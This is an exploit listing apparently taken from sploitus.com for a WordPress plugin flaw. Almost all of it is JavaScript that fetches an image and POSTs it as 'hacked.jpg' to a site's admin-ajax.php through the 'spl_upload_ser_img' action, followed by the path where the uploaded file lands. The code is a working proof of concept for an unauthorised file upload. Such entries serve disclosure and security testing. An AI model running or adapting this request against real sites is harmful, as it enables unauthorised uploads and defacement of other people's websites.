## https://sploitus.com/exploit?id=WPEX-ID:4365C813-4BD7-4C7C-A15B-EF9A42D32B26
fetch("https://upload.wikimedia.org/wikipedia/commons/e/e8/DID_U_ASK_4_MOAR_KINDESS_ON_WIKIPEDIA.jpg").then(r=>r.blob()).then(b=>{const p = new FormData();
p.set("action","spl_upload_ser_img");
p.set("file",new File([b],"hacked.jpg",{type:"image/jpeg"}));
fetch("https://example.com/wp-admin/admin-ajax.php",{method:"POST",body:p});
})
The uploaded file will be at https://example.com/wp-content/uploads/2021/09/hacked.jpg